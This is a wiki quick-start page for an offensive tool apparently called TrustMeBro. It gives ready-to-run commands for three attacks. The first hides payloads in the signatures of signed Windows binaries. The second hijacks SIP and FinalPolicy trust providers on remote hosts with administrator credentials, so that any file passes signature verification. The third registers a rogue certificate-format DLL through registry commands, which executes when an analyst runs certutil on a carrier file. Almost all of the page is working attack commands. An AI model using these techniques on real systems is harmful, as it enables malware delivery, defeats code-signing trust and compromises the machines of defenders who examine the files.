Skip to content

Quick Start

Kriyos Arcane edited this page Jul 4, 2026 · 1 revision

Quick Start

Three common scenarios. Each takes five steps or fewer.


Scenario 1: Embed a payload in a signed binary

Hide a payload inside a legitimately signed PE. The signature stays valid. No re-signing needed.

# 1. Pick a signed PE as your carrier (any Microsoft-signed binary works)
cp /mnt/c/Windows/System32/notepad.exe carrier.exe

# 2. Create your payload
echo "PAYLOAD_DATA_HERE" > payload.bin

# 3. Embed the payload into the carrier's PKCS#7 signature
python3 TrustMeBro.py embed -s carrier.exe -p payload.bin -o delivery.exe

# 4. Verify the signature is still valid
# On Windows: powershell -c "(Get-AuthenticodeSignature delivery.exe).Status"
# Expected: Valid

# 5. Extract on the other end
python3 TrustMeBro.py extract -s delivery.exe -o recovered.bin

For stealth, use camouflage mode. The payload hides inside a fake nested signature structure that uses a known Microsoft OID:

python3 TrustMeBro.py embed -s carrier.exe -p payload.bin -o delivery.exe --camouflage
python3 TrustMeBro.py extract -s delivery.exe -o recovered.bin --camouflage

Scenario 2: SIP hijack a remote target and clean up

Make any file pass signature verification on a remote Windows machine. Then reverse it.

# 1. Hijack the default SIP types (PE, PowerShell, MSI)
python3 TrustMeBro.py hijack 10.0.0.1 -u Administrator -p Password123

# 2. Verify on the target (open a NEW process after hijack)
# powershell -c "(Get-AuthenticodeSignature unsigned.exe).Status"
# Expected: Valid (any file passes now)

# 3. For maximum coverage, hijack all 17 SIP types
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --sip-types all

# 4. Or use FinalPolicy for a single-write system-wide bypass
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --action finalpolicy

# 5. Clean up when done
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --action clean
python3 TrustMeBro.py hijack 10.0.0.1 -u Admin -p Pass --action finalpolicy-clean

On the local Windows machine (no network, no credentials):

python3 TrustMeBro.py hijack --local --action hijack
python3 TrustMeBro.py hijack --local --action clean

Or with the C++ tool directly on the target:

TrustMeBro.exe hijack --sip-types PE,PowerShell,MSI
TrustMeBro.exe hijack --clean

Scenario 3: FormatGhost analyst-triggered persistence

Register a DLL that loads when an analyst runs certutil -dump or opens certificate properties on a carrier PE. The analyst's own tooling becomes the execution vector.

# 1. Build the FormatGhost DLL (Linux cross-compile)
cd tools/FormatGhost && make

# 2. Copy format_ghost.dll to the target at C:\Temp\format_ghost.dll

# 3. Embed a payload into a signed PE using the matching OID
python3 TrustMeBro.py embed -s signed.exe -p payload.bin -o carrier.exe --oid 1.3.6.1.4.1.311.99.1

# 4. Register the OID handler on the target (admin required)
# On target: reg add "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFormatObject\1.3.6.1.4.1.311.99.1" /v Dll /t REG_SZ /d "C:\Temp\format_ghost.dll" /f
# On target: reg add "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFormatObject\1.3.6.1.4.1.311.99.1" /v FuncName /t REG_SZ /d "FormatObject" /f

# 5. Trigger: when anyone runs "certutil -dump carrier.exe", the DLL loads
# The DLL writes the payload bytes to %TEMP%\format_ghost_payload.bin

Clean up:

reg delete "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFormatObject\1.3.6.1.4.1.311.99.1" /f

Clone this wiki locally